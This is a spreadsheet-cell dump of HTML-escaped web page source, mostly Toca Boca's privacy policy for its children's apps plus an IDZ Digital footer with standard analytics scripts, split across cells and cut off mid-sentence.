    <t>0.25rem;_x005F_x000D_
}_x005F_x000D_
.pis0 {padding-inline-start: 0px;}_x005F_x000D_
.d-inflex {display: inline-flex;}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;footer class=" text-center text-md-left padpurple" style="background-color:#F3F3F3;padding-top:10px;padding-bottom:10px;"&gt;_x005F_x000D_
  &lt;div class="container"&gt;_x005F_x000D_
	&lt;div class="row"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;_x005F_x000D_
		&lt;a style="color:#000;" href="https://www.idzdigital.com/"&gt;&lt;img class="img-fluid logos" src="img/Logo-footer.png" alt="IDZ Logo"&gt; &lt;/a&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right"  &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.facebook.com/idzdigital/" target="_blank" &gt;&lt;img class="socio-icons"  src="img/fb-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://in.linkedin.com/company/idzdigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/linkedin-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.youtube.com/channel/UCk648MRsOAP7uzD1HEqPC5g" target="_blank"&gt;&lt;img class="socio-icons"  src="img/youtube-icon.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://www.instagram.com/idz_digital/" target="_blank"&gt;&lt;img class="socio-icons"  src="img/insta.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a href="https://twitter.com/IDZDigital" target="_blank"&gt;&lt;img class="socio-icons"  src="img/twitter.png" &gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;div class="row" style="padding-top:2%"&gt;_x005F_x000D_
	  &lt;div class="col-md-6"&gt;	_x005F_x000D_
		&lt;p style="font-size:20px;padding-top: .75rem;padding-left:5px;"&gt;© 2017-2023 &lt;a class="purple" href="https://www.idzdigital.com/" &gt;IDZ Digital Pvt. Ltd.&lt;/a&gt; All Rights Reserved.&lt;/p&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	  &lt;div class="col-md-6 text-center text-md-right" &gt;_x005F_x000D_
		&lt;ul class="pis0 d-inflex flex-wrap list-group-horizontal"&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;margin-right: 20px;"&gt;&lt;a class="purple" href="terms_of_service.php" style="text-decoration:none;font-size:20px;"&gt;Terms of service&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
		  &lt;li class="list-group-item" style="border:none;background:#F3F3F3;"&gt;&lt;a class="purple" href="privacypolicy.php" style="text-decoration:none;font-size:20px;"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
_x005F_x000D_
		&lt;/ul&gt;_x005F_x000D_
	  &lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
&lt;/footer&gt;_x005F_x000D_
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="./js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"&gt;&lt;/script&gt;_x005F_x000D_
  &lt;script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
_x005F_x000D_
	(function($) { "use strict";_x005F_x000D_
_x005F_x000D_
	  $(function() {_x005F_x000D_
		var header = $(".start-style");_x005F_x000D_
		$(window).scroll(function() {    _x005F_x000D_
			var scroll = $(window).scrollTop();_x005F_x000D_
		_x005F_x000D_
			if (scroll &gt;= 10) {_x005F_x000D_
				header.removeClass('start-style').addClass("scroll-on");_x005F_x000D_
			} else {_x005F_x000D_
				header.removeClass("scroll-on").addClass('start-style');_x005F_x000D_
			}_x005F_x000D_
		});_x005F_x000D_
	  });		_x005F_x000D_
		_x005F_x000D_
    })(jQuery); _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-186060183-1"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
_x005F_x000D_
  gtag('config', 'UA-186060183-1');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Default Statcounter code for Idzdigital.com_x005F_x000D_
 http://idzdigital.com --&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
var sc_project=11610447; _x005F_x000D_
var sc_invisible=1; _x005F_x000D_
var sc_security="92b2e226"; _x005F_x000D_
&lt;/script&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;script type="text/javascript"_x005F_x000D_
src="https://www.statcounter.com/counter/counter.js"_x005F_x000D_
async&gt;&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;div class="statcounter"&gt;&lt;a title="Web Analytics_x005F_x000D_
Made Easy - StatCounter" href="https://statcounter.com/"_x005F_x000D_
target="_blank"&gt;&lt;img class="statcounter"_x005F_x000D_
src="https://c.statcounter.com/11610447/0/92b2e226/1/"_x005F_x000D_
alt="Web Analytics Made Easy -_x005F_x000D_
StatCounter"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End of Statcounter Code --&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible. If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;_x005F_x000D_
	We do not knowingly contact or do business with children under 13 years of age. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a class="numb" href="/cdn-cgi/l/email-protection#c4b7b1b4b4abb6b084ada0bea0ada3adb0a5a8eaa7aba9"&gt;&lt;span class="__cf_email__" data-cfemail="43303633332c3137032a2739272a242a37222f6d202c2e"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt; so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Changes to Privacy Policy:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
	&lt;html lang="en-US" class="no-js"&gt;
&lt;head&gt;
	&lt;!--=== META ===--&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="description" content="Toca Boca is an award-winning play studio that creates digital toys and everyday products for kids. "&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"&gt;
	&lt;!--===</t>
  </si>
  <si>
    <t>CSS ===--&gt;
	&lt;link rel="stylesheet" href="https://tocaboca.com/wp-content/themes/tocaboca/assets/dist/css/rev-main-5b892ad4da.css"&gt;
	&lt;!--=== ICONS ===--&gt;
	&lt;link rel="shortcut icon" href="https://tocaboca.com/wp-content/themes/tocaboca/assets/dist/img/favicon.png"&gt;
	&lt;link rel="apple-touch-icon" href="https://tocaboca.com/wp-content/themes/tocaboca/assets/dist/img/touch-icon.png"&gt;
	&lt;!--=== TITLE ===--&gt;
	&lt;title&gt;Privacy |</t>
  </si>
  <si>
    <t>The Power of Play | Toca Boca&lt;/title&gt;
	&lt;!--=== WP_HEAD() ===--&gt;
	&lt;script type="text/javascript"&gt;
		var ajaxurl = "https://tocaboca.com/wp-admin/admin-ajax.php";
	&lt;/script&gt;
	&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="The Power of Play | Toca Boca &amp;raquo; Privacy Comments Feed" href="https://tocaboca.com/privacy/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/tocaboca.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wpzoom-social-icons-block-style-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/block/dist/style-wpzoom-social-icons.css?ver=4.2.9' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://tocaboca.com/wp-includes/css/classic-themes.min.css?ver=1'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 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='menu-image-css' href='https://tocaboca.com/wp-content/plugins/menu-image/includes/css/menu-image.css?ver=3.0.8' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dashicons-css' href='https://tocaboca.com/wp-includes/css/dashicons.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ppress-frontend-css' href='https://tocaboca.com/wp-content/plugins/wp-user-avatar/assets/css/frontend.min.css?ver=4.5.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ppress-flatpickr-css' href='https://tocaboca.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.css?ver=4.5.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='ppress-select2-css' href='https://tocaboca.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpzoom-social-icons-socicon-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/wpzoom-socicon.css?ver=1673432245' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpzoom-social-icons-genericons-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/genericons.css?ver=1639207676' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpzoom-social-icons-academicons-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/academicons.min.css?ver=1673432245' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpzoom-social-icons-font-awesome-3-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/font-awesome-3.min.css?ver=1639207676' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpzoom-social-icons-styles-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/wpzoom-social-icons-styles.css?ver=1639207676' type='text/css' media='all' /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-academicons-ttf-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/academicons.ttf?v=1.9.2'  type='font/ttf' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-academicons-woff-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/academicons.woff?v=1.9.2'  type='font/woff' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-fontawesome-3-ttf-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/fontawesome-webfont.ttf?v=4.7.0'  type='font/ttf' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-fontawesome-3-woff-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/fontawesome-webfont.woff?v=4.7.0'  type='font/woff' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-fontawesome-3-woff2-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/fontawesome-webfont.woff2?v=4.7.0'  type='font/woff2' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-genericons-ttf-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/Genericons.ttf'  type='font/ttf' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-genericons-woff-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/Genericons.woff'  type='font/woff' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-socicon-ttf-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/socicon.ttf?v=4.2.9'  type='font/ttf' crossorigin /&gt;
&lt;link rel='preload' as='font'  id='wpzoom-social-icons-font-socicon-woff-css' href='https://tocaboca.com/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/socicon.woff?v=4.2.9'  type='font/woff' crossorigin /&gt;
&lt;script type='text/javascript' src='//code.jquery.com/jquery-2.1.1.min.js' id='jquery-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://tocaboca.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.js?ver=4.5.4' id='ppress-flatpickr-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://tocaboca.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.js?ver=4.5.4' id='ppress-select2-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://tocaboca.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://tocaboca.com/wp-json/wp/v2/pages/23293" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tocaboca.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://tocaboca.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel="canonical" href="https://tocaboca.com/privacy/" /&gt;
&lt;link rel='shortlink' href='https://tocaboca.com/?p=23293' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://tocaboca.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftocaboca.com%2Fprivacy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://tocaboca.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftocaboca.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;
					&lt;meta name="google-site-verification" content="W_mSusI8HXRkmIAjOJ8oZkDtRnduRSPkt_lywMbWXIU" /&gt;		
			        &lt;style&gt;
            span[class*="simple-icon-"] {
            	width: 1.5rem;
            	height: 1.5rem;
            	display: inline-block;
            }
            span[class*="simple-icon-"] svg {
            	display: inline-block;
            	vertical-align: middle;
                height: inherit;
                width: inherit;
            }
        &lt;/style&gt;
	&lt;meta property="og:url" content="https://tocaboca.com/privacy/"/&gt;
	&lt;meta property="og:title" content="Privacy | The Power of Play | Toca Boca"/&gt;
	&lt;meta property="og:site_name" content="The Power of Play | Toca Boca"/&gt;
	&lt;meta property="og:description" content="Toca Boca is an award-winning play studio that creates digital toys and everyday products for kids.</t>
  </si>
  <si>
    <t xml:space="preserve">"/&gt;
	&lt;meta property="og:type" content="website"/&gt;
	&lt;meta property="og:image" content="http://tocaboca.test/wp-content/themes/tocaboca/assets/dist/img/default-share.png"/&gt;
	&lt;meta property="og:locale" content="en_US"/&gt;
	&lt;/head&gt;
&lt;body&gt;
	&lt; main&gt;
&lt;div class="hero hero-light"&gt;
			&lt;div class="hero-background"&gt;
			&lt;ul class="slideshow"&gt;
									&lt;li style="background-image: url('https://tocaboca.com/wp-content/uploads/2014/11/TocaBoca_0108_office_DARK-2000x1040.jpg');"&gt;&lt;/li&gt;
							&lt;/ul&gt;
		&lt;/div&gt;
	&lt;div class="hero-content"&gt;&lt;div&gt;
					&lt;h1 class="headline"&gt;Our Privacy Policy&lt;/h1&gt;
					&lt;p class="lead"&gt;We take privacy seriously.&lt;/p&gt;
	&lt;/div&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;section class="section section-default layout-" style=""&gt;
	&lt;div class="section-inner"&gt;
					&lt;div class="section-content"&gt;
														&lt;div class="module module-paragraph "&gt;
&lt;article class="paragraph paragraph-left"&gt;
			&lt;figure class="item"&gt;
	&lt;/figure&gt;	
&lt;div class="paragraph-content"&gt;
		&lt;h2&gt;&lt;b&gt;PRIVACY POLICY&lt;/b&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Hello! This is where we keep our Privacy Policy. </t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Our Privacy Policy was last updated on February 15, 2023.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Effective Date: June 30th, 2013&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;About Us&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;At Toca Boca, our website (www.tocaboca.com) is just for parents, while our apps are designed for the whole family, including young children with parent supervision. We take privacy seriously at Toca Boca and this policy is designed to share what information we collect and how we use it.</t>
  </si>
  <si>
    <t>We last updated the contents of this policy on February 15, 2023. Toca Boca may change or update the Privacy Policy at any time as we add new or different features, or as the law changes. Unless another date is given, the changes are effective upon posting.</t>
  </si>
  <si>
    <t>If we make a material change to this policy we will post notice here before making the change and if we have your parent email address we will contact you to tell you about the changes. Thus, you should review the Privacy Policy frequently. This Privacy Policy is also part of the Terms of Service that explain your rights and responsibilities and Toca Boca’s when using Toca Boca’s services and sites.</t>
  </si>
  <si>
    <t>If you don’t agree with this Privacy Policy or the Terms of Service, you should not use the sites and services. If you have any questions please contact us at dpo@spinmaster.com. Toca Boca is owned by Spin Master Corp., a global children’s entertainment company that creates, designs and manufactures a diversified portfolio of innovative toys, games, products and entertainment properties.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Children’s Privacy&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;There are no third-party ads in our apps, but we do cross promote our other products or the products on our related companies.</t>
  </si>
  <si>
    <t>The only third party service providers we use in our apps are to support our internal operations and we do not collect anything that is personally identifiable in our apps for children.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;To help us provide you with the best service, we work with third party analytics providers Backtrace, Firebase and Google Analytics in our apps for children.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Their respective Privacy Policies can be found at&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;https://saucelabs.com/privacy-policy&lt;/span&gt;&lt;span style="font-weight: 400;"&gt;, https://firebase.google.com/terms/data-processing-terms and https://policies.google.com/privacy?hl=en-US#whycollect&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;These companies help us to understand your use of the apps. In association with them, we may collect your unique device identifier, IP address, mobile phone carrier, game progress, time spent playing, achievements and for bug and crash reports.</t>
  </si>
  <si>
    <t>This information is for internal use only and can´t be shared. It´s just for us to help us improve our services for you.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We also work with AppsFlyer as an attribution provider to help us understand your interactions with the apps and to optimize and analyze mobile ad campaigns. AppsFlyer does not collect any personally identifiable information about you or your child.</t>
  </si>
  <si>
    <t>For more information on AppsFlyers´s privacy practices, please review the privacy policy: &lt;/span&gt;&lt;a href="https://www.appsflyer.com/legal/services-privacy-policy/"&gt;&lt;span style="font-weight: 400;"&gt;https://www.appsflyer.com/legal/services-privacy-policy/&lt;/span&gt;&lt;/a&gt;&lt;span style="font-weight: 400;"&gt; .&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you have any questions about our collection and use please contact us at dpo@spinmaster.com.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Kids Privacy Assured by PRIVO: COPPA Safe Harbor Certification&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Toca Boca, Inc is a member of the PRIVO Kids Privacy Assured COPPA Safe Harbor Certification Program (“the Program”). The Program certification applies to the digital properties listed on the validation page that is viewable by clicking on the PRIVO Seal.</t>
  </si>
  <si>
    <t>PRIVO is an independent, third-party organization committed to safeguarding children’s personal information collected online. The PRIVO COPPA certification Seal posted on this page indicates Toca Boca, Inc has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process. If you have questions or concerns about our privacy&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;practices, please contact us at dpo@spinmaster.com or 415-352-9028.</t>
  </si>
  <si>
    <t>If you have further concerns after you have contacted us, you can contact PRIVO directly at privacy@privo.com.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://cert.privo.com/#/companies/tocaboca"&gt;&lt;img decoding="async" class="alignnone size-full wp-image-25013" src="https://tocaboca.com/wp-content/uploads/2023/02/seal-coppa.svg" alt="" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;General Privacy&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;What Kind of Information is Collected?&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;There are two types of data that may be collected. The first one is called personal data. This is personally identifiable information that identifies a user as an individual.</t>
  </si>
  <si>
    <t>Toca Boca may collect personal data that parents voluntarily provide on the website. The second type is non personal data which doesn’t directly identify an individual or which may have been personal information but has had the personally identifiable information removed. Toca Boca may collect non personal information about the use of the website and apps to help us improve our services.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;More About Personal Data&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We collect personal data when a parent makes a purchase through our online store, subscribes to a newsletter or alert, submits content to a forum or blog, or requests technical support.</t>
  </si>
  <si>
    <t>This data may include a name (screen or nickname), gender, birth date, email address, mailing or shipping address, telephone number, and payment information. This information may be used to provide services and the sites to you, to process and fulfill your orders, to contact parents about their orders and new services and features and to send push notifications if consent to receive them has been given. If you contact us for help we will only use your email address to reply to your question.</t>
  </si>
  <si>
    <t>Please note that if a parent posts personal information about themselves in a community forum or blog in the parent section, in addition to being collected, this data is made public for others to see. The parent is responsible for the disclosure of any such data in those forums. More about Non Personal Data we may use cookies and web beacons to help deliver and analyze our services (e.g., by counting the number of times a page or advert has been viewed).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight:</t>
  </si>
  <si>
    <t>400;"&gt;Toca Boca may also use third parties from time to time to deliver a service to parents only, such as payment processing, sending emails, infrastructure and IT services, or helping with customer or technical support. We only work with companies that follow this privacy policy and agree not to use your information for any other purposes. If you’d like more information on this, please contact us at dpo@spinmaster.com.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;A Word About What We Might Disclose&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;As you can see, we collect minimal personal data, and some nonpersonal data for internal use only or in conjunction with third parties to help us operate, analyze, and improve our sites and services.</t>
  </si>
  <si>
    <t>In addition, we may disclose your personal or nonpersonal information to additional parties if we believe we are required to by law, by a judicial proceeding, to protect Toca Boca’s rights and properties, or to investigate fraud, intellectual property infringement, and any other conduct that might be illegal or expose Toca Boca or a user of its services to legal liability. In addition, Toca Boca may disclose information collected from a parent in the event of a change or proposed change in the ownership of the company; for example, a sale, a merger, or bankruptcy. Parents may disclose information about themselves by posting in the public forums on the site.</t>
  </si>
  <si>
    <t>Toca Boca is not responsible for what parents say and post in these sections.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;Tracking&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We use quantserve.com to track anonymous information about how website visitors use the site. YouTube cookies are placed on visitors’ devices when a visitor arrives on a Toca Boca page where there is a YouTube video, and user data is collected through videos embedded in websites, which is aggregated with profile data from other Google services in order to display targeted advertising to web visitors across a broad range of their own and other websites. We have these cookies to better understand the use of our website for parents.</t>
  </si>
  <si>
    <t>You can also configure your browser to accept or reject cookies. All browsers are different so go to the help section of your browser to find out how to do this.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;Links&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;We may include links to third parties from our website or services. Toca Boca isn’t responsible for these companies and including a link to them doesn’t mean that Toca Boca endorses them.</t>
  </si>
  <si>
    <t>So be sure to check their privacy policies if you decide to visit them. And remember, your use of Toca Boca’s sites and services may also be subject to the terms and conditions and privacy policies of other services that Toca Boca doesn’t control such as mobile application stores, mobile software platforms, online social media sites, or payment processors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;Security&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Toca Boca uses generally accepted security measures and safeguards in an attempt to keep the data it collects secure and requires that the third parties it works with agree to do the same.</t>
  </si>
  <si>
    <t>The measures and safeguards include limiting access to the data to those persons who need it to complete their work for Toca Boca, using a fire-wall protected environment, and storing personal information in secure operating environments. That said, Toca Boca cannot and does not guarantee and does not accept liability for unintentional disclosure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;&lt;span style="font-weight: 400;"&gt;Data Retention&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;User data is retained as long as it is necessary to provide the service. Data is deleted from our records when it is no longer needed within a reasonable timeframe.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;How to Update or Remove Your Information&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight:</t>
  </si>
  <si>
    <t>400;"&gt;Toca Boca keeps your content for as long as necessary in providing its services. If you want to opt out of services, or review or delete your information, please contact us at dpo@spinmaster.com.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;Notice to California Residents:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;If you are a California resident, California Civil Code Section 1798.83 permits you to request information regarding the disclosure of your personal information by certain members of TOCA BOCA to third parties for the third parties’ direct marketing purposes. With respect to these entities, this Privacy Policy applies only to their activities within the State of California.</t>
  </si>
  <si>
    <t>To make such a request, please send an email to dpo@spin</t>
  </si>
  <si>
    <t>If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible. If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;_x005F_x000D_
	We do not knowingly contact or do business with children under 13 years of age. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a class="numb" href="/cdn-cgi/l/email-protection#c6b5b3b6b6a9b4b286afa2bca2afa1afb2a7aae8a5a9ab"&gt;&lt;span class="__cf_email__" data-cfemail="ff8c8a8f8f908d8bbf969b859b9698968b9e93d19c9092"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt; so that we may rectify the situation.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Changes to Privacy Policy:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
